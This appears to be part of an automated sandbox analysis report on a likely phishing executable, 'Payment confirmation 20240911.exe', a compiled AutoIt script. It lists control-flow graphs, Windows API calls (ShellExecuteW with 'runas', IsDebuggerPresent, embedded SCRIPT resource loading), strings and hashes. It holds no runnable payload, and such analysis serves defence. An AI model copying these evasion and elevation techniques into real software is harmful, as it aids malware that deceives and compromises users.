12e1747 RegisterWindowMessageW 110107->110109 110109->110058 110111 12e176e 110110->110111 110112 13567dd 110110->110112 110113 130010a 48 API calls 110111->110113 110139 132d231 50 API calls 110112->110139 110115 12e1776 110113->110115 110115->110062 110116 13567e8 110117->110069 110118->110071 110140 132a2dc 54 API calls 110118->110140 110126 12e17fc 110119->110126 110122 12e17fc 48 API calls 110123 12e17f0 110122->110123 110124 12ed3d2 48 API calls 110123->110124 110125 12e165b 110124->110125 110125->110076 110127 12ed3d2 48 API calls 110126->110127 110128 12e1807 110127->110128 110129 12ed3d2 48 API calls 110128->110129 110130 12e180f 110129->110130 110131 12ed3d2 48 API calls 110130->110131 110132 12e17e8 110131->110132 110132->110122 110133->110080 110135 12ed3d2 48 API calls 110134->110135 110136 12e7d79 110135->110136 110137 12ed3d2 48 API calls 110136->110137 110138 12e1693 110137->110138 110138->110088 110139->110116 110141 1351eca 110146 12fbe17 110141->110146 110145 1351ed9 110147 12ed3d2 48 API calls 110146->110147 110148 12fbe85 110147->110148 110155 12fc929 110148->110155 110150 135db92 110152 12fbf22 110152->110150 110153 12fbf3e 110152->110153 110158 12fc8b7 48 API calls _memmove 110152->110158 110154 1301b2a 52 API calls __cinit 110153->110154 110154->110145 110159 12fc955 110155->110159 110158->110152 110160 12fc962 110159->110160 110161 12fc948 110159->110161 110160->110161 110162 12fc969 RegOpenKeyExW 110160->110162 110161->110152 110162->110161 110163 12fc983 RegQueryValueExW 110162->110163 110164 12fc9b9 RegCloseKey 110163->110164 110165 12fc9a4 110163->110165 110164->110161 110165->110164

                                          Executed Functions

                                          Function 0130BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 641 130bdf6-130be33 call 1310650 644 130be35-130be37 641->644 645 130be3c-130be3e 641->645 646 130c613-130c61f call 130b4bf 644->646 647 130be40-130be5a call 130886a call 130889e call 1307aa0 645->647 648 130be5f-130be8c 645->648 647->646 649 130be93-130be9a 648->649 650 130be8e-130be91 648->650 655 130beb8 649->655 656 130be9c-130beb3 call 130886a call 130889e call 1307aa0 649->656 650->649 654 130bebe-130bec3 650->654 659 130bed2-130bee0 call 13149a2 654->659 660 130bec5-130becf call 13105df 654->660 655->654 690 130c604-130c607 656->690 671 130bee6-130bef8 659->671 672 130c1fe-130c210 659->672 660->659 671->672 674 130befe-130bf36 call 130869d GetConsoleMode 671->674 675 130c216-130c226 672->675 676 130c56b-130c588 WriteFile 672->676 674->672 697 130bf3c-130bf42 674->697 681 130c22c-130c237 675->681 682 130c30d-130c312 675->682 678 130c594-130c59a GetLastError 676->678 679 130c58a-130c592 676->679 684 130c59c 678->684 679->684 688 130c23d-130c24d 681->688 689 130c5ce-130c5e6 681->689 685 130c416-130c421 682->685 686 130c318-130c321 682->686 694 130c5a2-130c5a4 684->694 685->689 693 130c427 685->693 686->689 695 130c327 686->695 698 130c253-130c256 688->698 691 130c5f1-130c601 call 130889e call 130886a 689->691 692 130c5e8-130c5eb 689->692 696 130c611-130c612 690->696 691->690 692->691 699 130c5ed-130c5ef 692->699 700 130c431-130c446 693->700 702 130c5a6-130c5a8 694->702 703 130c609-130c60f 694->703 704 130c331-130c348 695->704 696->646 705 130bf44-130bf46 697->705 706 130bf4c-130bf6f GetConsoleCP 697->706 707 130c258-130c271 698->707 708 130c29c-130c2d3 WriteFile 698->708 699->696 710 130c44c-130c44e 700->710 702->689 712 130c5aa-130c5af 702->712 703->696 713 130c34e-130c351 704->713 705->672 705->706 714 130c1f3-130c1f9 706->714 715 130bf75-130bf7d 706->715 716 130c273-130c27d 707->716 717 130c27e-130c29a 707->717 708->678 709 130c2d9-130c2eb 708->709 709->694 718 130c2f1-130c302 709->718 719 130c450-130c466 710->719 720 130c48b-130c4cc WideCharToMultiByte 710->720 722 130c5b1-130c5c3 call 130889e call 130886a 712->722 723 130c5c5-130c5cc call 130887d 712->723 724 130c391-130c3da WriteFile 713->724 725 130c353-130c369 713->725 714->702 726 130bf87-130bf89 715->726 716->717 717->698 717->708 718->688 729 130c308 718->729 730 130c468-130c477 719->730 731 130c47a-130c489 719->731 720->678 733 130c4d2-130c4d4 720->733 722->690 723->690 724->678 738 130c3e0-130c3f8 724->738 735 130c380-130c38f 725->735 736 130c36b-130c37d 725->736 727 130c11e-130c121 726->727 728 130bf8f-130bfb1 726->728 741 130c123-130c126 727->741 742 130c128-130c155 727->742 739 130bfb3-130bfc8 728->739 740 130bfca-130bfd6 call 13022a8 728->740 729->694 730->731 731->710 731->720 743 130c4da-130c50d WriteFile 733->743 735->713 735->724 736->735 738->694 746 130c3fe-130c40b 738->746 748 130c024-130c036 call 1314ea7 739->748 761 130bfd8-130bfec 740->761 762 130c01c-130c01e 740->762 741->742 750 130c15b-130c15e 741->750 742->750 751 130c52d-130c541 GetLastError 743->751 752 130c50f-130c529 743->752 746->704 747 130c411 746->747 747->694 772 130c1e8-130c1ee 748->772 773 130c03c 748->773 755 130c160-130c163 750->755 756 130c165-130c178 call 1316634 750->756 760 130c547-130c549 751->760 752->743 758 130c52b 752->758 755->756 763 130c1ba-130c1bd 755->763 756->678 775 130c17e-130c188 756->775 758->760 760->684 766 130c54b-130c563 760->766 769 130bff2-130c007 call 1314ea7 761->769 770 130c1c5-130c1e0 761->770 762->748 763->726 768 130c1c3 763->768 766->700 767 130c569 766->767 767->694 768->772 769->772 783 130c00d-130c01a 769->783 770->772 772->684 776 130c042-130c077 WideCharToMultiByte 773->776 779 130c18a-130c1a1 call 1316634 775->779 780 130c1ae-130c1b4 775->780 776->772 777 130c07d-130c0a3 WriteFile 776->777 777->678 782 130c0a9-130c0c1 777->782 779->678 786 130c1a7-130c1a8 779->786 780->763 782->772 785 130c0c7-130c0ce 782->785 783->776 785->780 787 130c0d4-130c0ff WriteFile 785->787 786->780 787->678 788 130c105-130c10c 787->788 788->772 789 130c112-130c119 788->789 789->780
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67210c60182ac3e37decc3429310f9e89094144367aeec5b81e10f60697ea1f2
                                          • Instruction ID: 9e92ad8ba87fc701e5947484a939d6d26f343efead1a755d8aed9eeade7e7f21
                                          • Opcode Fuzzy Hash: 67210c60182ac3e37decc3429310f9e89094144367aeec5b81e10f60697ea1f2
                                          • Instruction Fuzzy Hash: 3E325C75B022298FDB26CF59DC906E9B7F9FB46314F0841D9E50AA7A84D7309E80CF52
                                          Function 012E374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 012E376D
                                            • Part of subcall function 012E4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,00000000,00000001,00000000), ref: 012E428C
                                          • IsDebuggerPresent.KERNEL32(?,?), ref: 012E377F
                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Payment confirmation 20240911.exe,00000104,?,013A1120,C:\Users\user\Desktop\Payment confirmation 20240911.exe,013A1124,?,?), ref: 012E37EE
                                            • Part of subcall function 012E34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 012E352A
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 012E3860
                                          • MessageBoxA.USER32 ref: 013521C5
                                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 013521FD
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 01352232
                                          • GetForegroundWindow.USER32 ref: 01352290
                                          • ShellExecuteW.SHELL32(00000000), ref: 01352297
                                            • Part of subcall function 012E30A5: GetSysColorBrush.USER32 ref: 012E30B0
                                            • Part of subcall function 012E30A5: LoadCursorW.USER32 ref: 012E30BF
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30D5
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30E7
                                            • Part of subcall function 012E30A5: LoadIconW.USER32 ref: 012E30F9
                                            • Part of subcall function 012E30A5: RegisterClassExW.USER32(?), ref: 012E3167
                                            • Part of subcall function 012E2E9D: CreateWindowExW.USER32 ref: 012E2ECB
                                            • Part of subcall function 012E2E9D: CreateWindowExW.USER32 ref: 012E2EEC
                                            • Part of subcall function 012E2E9D: ShowWindow.USER32(00000000), ref: 012E2F00
                                            • Part of subcall function 012E2E9D: ShowWindow.USER32(00000000), ref: 012E2F09
                                            • Part of subcall function 012E3598: _memset.LIBCMT ref: 012E35BE
                                            • Part of subcall function 012E3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 012E3667
                                          Strings
                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 013521BE
                                          • runas, xrefs: 0135228B
                                          • C:\Users\user\Desktop\Payment confirmation 20240911.exe, xrefs: 012E37B4, 012E37E9, 012E37FD, 01352257
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                          • String ID: C:\Users\user\Desktop\Payment confirmation 20240911.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                          • API String ID: 4253510256-3990037821
                                          • Opcode ID: 0ed0dfd9a83378812cdcf58f3687b8923d2f7587a39515f596bca45c897bcc2f
                                          • Instruction ID: 4daebee0a3bc66545d7c3ef61635f92492fa40ada40244ee10a3b7cbf54ec546
                                          • Opcode Fuzzy Hash: 0ed0dfd9a83378812cdcf58f3687b8923d2f7587a39515f596bca45c897bcc2f
                                          • Instruction Fuzzy Hash: 4A514574754246BADF20EBE5DC4AFBE7FFCEB15749F80006AE68193284CB605545CB21
                                          Function 012FE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1206 12fe47b-12fe50a call 12ed3d2 GetVersionExW call 12e7e53 call 12fe5f8 call 12fe617 1215 13529f9-13529fc 1206->1215 1216 12fe510-12fe511 1206->1216 1217 1352a15-1352a19 1215->1217 1218 13529fe 1215->1218 1219 12fe54d-12fe55d call 12fe6d1 1216->1219 1220 12fe513-12fe51e 1216->1220 1223 1352a04-1352a0d 1217->1223 1224 1352a1b-1352a24 1217->1224 1222 1352a01 1218->1222 1233 12fe55f-12fe57c GetCurrentProcess call 12fe70e 1219->1233 1234 12fe582-12fe59c 1219->1234 1225 135297f-1352985 1220->1225 1226 12fe524-12fe526 1220->1226 1222->1223 1223->1217 1224->1222 1230 1352a26-1352a29 1224->1230 1228 1352987-135298a 1225->1228 1229 135298f-1352995 1225->1229 1231 12fe52c-12fe52f 1226->1231 1232 135299a-13529a6 1226->1232 1228->1219 1229->1219 1230->1223 1237 13529c6-13529c9 1231->1237 1238 12fe535-12fe544 1231->1238 1235 13529b0-13529b6 1232->1235 1236 13529a8-13529ab 1232->1236 1233->1234 1257 12fe57e 1233->1257 1240 12fe59e-12fe5b2 call 12fe694 1234->1240 1241 12fe5ec-12fe5f6 GetSystemInfo 1234->1241 1235->1219 1236->1219 1237->1219 1242 13529cf-13529e4 1237->1242 1243 12fe54a 1238->1243 1244 13529bb-13529c1 1238->1244 1254 12fe5e4-12fe5ea GetSystemInfo 1240->1254 1255 12fe5b4-12fe5bc call 12fe437 GetNativeSystemInfo 1240->1255 1246 12fe5c9-12fe5d5 1241->1246 1248 13529e6-13529e9 1242->1248 1249 13529ee-13529f4 1242->1249 1243->1219 1244->1219 1250 12fe5dc-12fe5e1 1246->1250 1251 12fe5d7-12fe5da FreeLibrary 1246->1251 1248->1219 1249->1219 1251->1250 1256 12fe5be-12fe5c2 1254->1256 1255->1256 1256->1246 1259 12fe5c4-12fe5c7 FreeLibrary 1256->1259 1257->1234 1259->1246
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 012FE4A7
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • GetCurrentProcess.KERNEL32(00000000,0137DC28,?,?), ref: 012FE567
                                          • GetNativeSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5BC
                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 012FE5C7
                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 012FE5DA
                                          • GetSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5E4
                                          • GetSystemInfo.KERNEL32(?,0137DC28,?,?), ref: 012FE5F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                          • String ID:
                                          • API String ID: 2717633055-0
                                          • Opcode ID: d332da971fdbc93ca89621c448927bebbd27ece76468efb215d08b8e3d7d7608
                                          • Instruction ID: cc8859de4a635cf3763b7f4f16288a2d7560caa2345fd6b0d5f9d1a2167ce706
                                          • Opcode Fuzzy Hash: d332da971fdbc93ca89621c448927bebbd27ece76468efb215d08b8e3d7d7608
                                          • Instruction Fuzzy Hash: E561D3B18293C4CFCF16CF68A4C55EABFB46F2A204F1A45EDD9449B31BE624C508CB65
                                          Function 012E31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1278 12e31f2-12e320a CreateStreamOnHGlobal 1279 12e320c-12e3223 FindResourceExW 1278->1279 1280 12e322a-12e322d 1278->1280 1281 13557d3-13557e2 LoadResource 1279->1281 1282 12e3229 1279->1282 1281->1282 1283 13557e8-13557f6 SizeofResource 1281->1283 1282->1280 1283->1282 1284 13557fc-1355807 LockResource 1283->1284 1284->1282 1285 135580d-1355815 1284->1285 1286 1355819-135582b 1285->1286 1286->1282
                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 012E3202
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 012E3219
                                          • LoadResource.KERNEL32(?,00000000), ref: 013557D7
                                          • SizeofResource.KERNEL32(?,00000000), ref: 013557EC
                                          • LockResource.KERNEL32(?), ref: 013557FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: cd0a4e6d202b2630a4ad0bc8d7a08337b66828a38db74d5d6c6694bd4e2a0a00
                                          • Instruction ID: 744125aa734dde8e2cf68a0a23aa3577918fc071501294d472d5637af38973e6
                                          • Opcode Fuzzy Hash: cd0a4e6d202b2630a4ad0bc8d7a08337b66828a38db74d5d6c6694bd4e2a0a00
                                          • Instruction Fuzzy Hash: 4F115A70210701BFE7219BA5EC48F277BBDFBC9B52F108428F68687250DA71DC00CA60
                                          Function 012FDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(012EC848,012EC848), ref: 012FDDA2
                                          • FindFirstFileW.KERNEL32(012EC848,?), ref: 01354A83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$AttributesFindFirst
                                          • String ID:
                                          • API String ID: 4185537391-0
                                          • Opcode ID: 5f0131ece3af3a2b1ac4da66b180dafdf4511ff141ac6ab506e417c60359a942
                                          • Instruction ID: 36fdc702f80f7c47fea871e843719ce17cb0ea1966d051f31a6889b415b72e8e
                                          • Opcode Fuzzy Hash: 5f0131ece3af3a2b1ac4da66b180dafdf4511ff141ac6ab506e417c60359a942
                                          • Instruction Fuzzy Hash: 6CE0923252440597D26467BC9C0E8A97A9C9A0533CF104719F975C10E0E7B0994086D6
                                          Function 01308E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 01308E1F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 7c32607c0566924eafb31c19484fb89d080020e3b6c1c095d94ee6ce59d30629
                                          • Instruction ID: e4fa8b2b9d08d4ab26034c03ccd379f0f9ffaec90c92a79e90350a8dfe0faf2a
                                          • Opcode Fuzzy Hash: 7c32607c0566924eafb31c19484fb89d080020e3b6c1c095d94ee6ce59d30629
                                          • Instruction Fuzzy Hash: 46A01130000A0CABCA002AA2E808888BFACEA082A0B008020F80C000228B33A8208A88
                                          Function 012EE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012EE279
                                          • timeGetTime.WINMM ref: 012EE51A
                                          • TranslateMessage.USER32(?), ref: 012EE646
                                          • DispatchMessageW.USER32(?), ref: 012EE651
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012EE664
                                          • LockWindowUpdate.USER32(00000000), ref: 012EE697
                                          • DestroyWindow.USER32 ref: 012EE6A3
                                          • GetMessageW.USER32 ref: 012EE6BD
                                          • Sleep.KERNEL32(0000000A), ref: 01355B15
                                          • TranslateMessage.USER32(?), ref: 013562AF
                                          • DispatchMessageW.USER32(?), ref: 013562BD
                                          • GetMessageW.USER32 ref: 013562D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 2641332412-570651680
                                          • Opcode ID: b8fcff9bdafbc7ce437aa7d5d19d035afa55746f406cd19527d143d4d06b0fa2
                                          • Instruction ID: eafac51b6dbe2d17741f82d3a9186117dac4b74f3f0f2327a9baaa2a2b30d167
                                          • Opcode Fuzzy Hash: b8fcff9bdafbc7ce437aa7d5d19d035afa55746f406cd19527d143d4d06b0fa2
                                          • Instruction Fuzzy Hash: 28622A70514341CFEB25DF68C888FAA7BE8BF45708F44497DEA468B295D7B0E848CB52
                                          Function 01316A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___createFile.LIBCMT ref: 01316C73
                                          • ___createFile.LIBCMT ref: 01316CB4
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01316CDD
                                          • __dosmaperr.LIBCMT ref: 01316CE4
                                          • GetFileType.KERNEL32 ref: 01316CF7
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 01316D1A
                                          • __dosmaperr.LIBCMT ref: 01316D23
                                          • CloseHandle.KERNEL32(00000000), ref: 01316D2C
                                          • __set_osfhnd.LIBCMT ref: 01316D5C
                                          • __lseeki64_nolock.LIBCMT ref: 01316DC6
                                          • __close_nolock.LIBCMT ref: 01316DEC
                                          • __chsize_nolock.LIBCMT ref: 01316E1C
                                          • __lseeki64_nolock.LIBCMT ref: 01316E2E
                                          • __lseeki64_nolock.LIBCMT ref: 01316F26
                                          • __lseeki64_nolock.LIBCMT ref: 01316F3B
                                          • __close_nolock.LIBCMT ref: 01316F9B
                                            • Part of subcall function 0130F84C: CloseHandle.KERNEL32(00000000), ref: 0130F89C
                                            • Part of subcall function 0130F84C: GetLastError.KERNEL32(?,01316DF1,0138EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0130F8A6
                                            • Part of subcall function 0130F84C: __free_osfhnd.LIBCMT ref: 0130F8B3
                                            • Part of subcall function 0130F84C: __dosmaperr.LIBCMT ref: 0130F8D5
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __lseeki64_nolock.LIBCMT ref: 01316FBD
                                          • CloseHandle.KERNEL32(00000000), ref: 013170F2
                                          • ___createFile.LIBCMT ref: 01317111
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0131711E
                                          • __dosmaperr.LIBCMT ref: 01317125
                                          • __free_osfhnd.LIBCMT ref: 01317145
                                          • __invoke_watson.LIBCMT ref: 01317173
                                          • __wsopen_helper.LIBCMT ref: 0131718D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                          • String ID: @
                                          • API String ID: 3896587723-2766056989
                                          • Opcode ID: d52801ef46d82f45abb6ee8d36471eb1083ef00a5aff7207d63c1b57a06d7712
                                          • Instruction ID: c10b6b4b423740a641ed812764a20c4125f53373f250e66c04fb1df5616e612d
                                          • Opcode Fuzzy Hash: d52801ef46d82f45abb6ee8d36471eb1083ef00a5aff7207d63c1b57a06d7712
                                          • Instruction Fuzzy Hash: 982227B1D0020A9BFF2E8EACDC527BD7F65EB0432CF188269E611972D9C7B58950C751
                                          Function 013301E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • _wcscpy.LIBCMT ref: 0133026A
                                          • _wcschr.LIBCMT ref: 01330278
                                          • _wcscpy.LIBCMT ref: 0133028F
                                          • _wcscat.LIBCMT ref: 0133029E
                                          • _wcscat.LIBCMT ref: 013302BC
                                          • _wcscpy.LIBCMT ref: 013302DD
                                          • __wsplitpath.LIBCMT ref: 013303BA
                                          • _wcscpy.LIBCMT ref: 013303DF
                                          • _wcscpy.LIBCMT ref: 013303F1
                                          • _wcscpy.LIBCMT ref: 01330406
                                          • _wcscat.LIBCMT ref: 0133041B
                                          • _wcscat.LIBCMT ref: 0133042D
                                          • _wcscat.LIBCMT ref: 01330442
                                            • Part of subcall function 0132C890: _wcscmp.LIBCMT ref: 0132C92A
                                            • Part of subcall function 0132C890: __wsplitpath.LIBCMT ref: 0132C96F
                                            • Part of subcall function 0132C890: _wcscpy.LIBCMT ref: 0132C982
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C995
                                            • Part of subcall function 0132C890: __wsplitpath.LIBCMT ref: 0132C9BA
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C9D0
                                            • Part of subcall function 0132C890: _wcscat.LIBCMT ref: 0132C9E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
